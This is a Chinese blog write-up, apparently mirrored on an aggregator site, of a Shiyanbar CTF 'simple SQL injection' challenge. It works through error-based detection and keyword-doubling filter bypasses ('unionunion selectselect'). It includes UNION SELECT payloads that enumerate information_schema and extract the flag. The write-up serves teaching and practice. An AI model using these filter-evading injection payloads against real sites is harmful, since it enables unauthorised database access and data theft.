美文网首页
实验吧CTF-WEB

实验吧CTF-WEB

作者: syxvip | 来源:发表于2018-08-01 17:16 被阅读0次

实验吧CTF题库-WEB

做题并没有按照顺序,跳着来做的,写文章的目的就是为了记录下解题的思路,当然如果能够顺便帮助到别人的话是最好不过的啦,哈哈~~~,有道友的话欢迎交流。

1. 简单的sql注入

通过注入获得flag值(提交格式:flag{})
解题链接: [http://ctf5.shiyanbar.com/423/web/]

键入 1’
提交后页面报错。You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

所以页面应该是字符串注入,用order by 检测下有三列
然后用联合查询,因为他过滤了过滤了关键词以及字段,所以用重复两个关键字来对付过滤机制。

1' unionunion  selectselect  table_name  fromfrom  information_schema.tables wherewhere '1'='1

提交后爆出来的标段存在flage

1' unionunion  selectselect  column_namcolumn_namee  fromfrom  information_schema.coluinformation_schema.columnsmns  wherewhere  table_name='flag


1'  unionunion  selectselect  flag  fromfrom  flag  wherewhere  '1'='1

ID: 1' union select flag from flag where '1'='1
name: baloteli
ID: 1' union select flag from flag where '1'='1
name: flag{Y0u_@r3_5O_dAmn_90Od}

相关文章

  • 实验吧CTF-WEB

    实验吧CTF题库-WEB 做题并没有按照顺序,跳着来做的,写文章的目的就是为了记录下解题的思路,当然如果能够顺便帮...

  • 实验吧CTF-Web题 简单的sql注入

    1. 首先检测是否存在注入点,输入',产生报错如下: You have an error in your SQL ...

  • ctf-web总结

    web代码审计这里参照大佬的文章https://www.cnblogs.com/Hg-Yyq/p/8641992....

  • 实验吧-FALSE

    FALSE 原题链接 http://ctf5.shiyanbar.com/web/false.php 分析 注意到...

  • 实验吧-Forms

    Forms 原题链接 http://ctf5.shiyanbar.com/10/main.php 分析 很简单。。...

  • [实验吧]Web

    简单的登录题 解题链接: [http://ctf5.shiyanbar.com/web/jiandan/index...

  • 实验吧 trivial

    自己是真的菜。 网上的解题代码很多了,这里就不说了,主要是解析一下。 PS:trivial在数学里是一眼就可以看出...

  • 【CTF-Web】Shiyanbar_HTTP

    0X01 头有点大 打开网页:发现提示: 可以看出,应该也是抓包改包:他的要求有三个:1、安装了 .net fra...

  • 神圣的事

    学习 踢球 做实验 是吧~

  • 实验吧-逆向-证明自己吧

    题目:http://www.shiyanbar.com/ctf/28 1.附件 2.PEID打开,Microsof...

网友评论

      本文标题:实验吧CTF-WEB

      本文链接:https://www.haomeiwen.com/subject/eadpkftx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|实验吧CTF-WEB|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!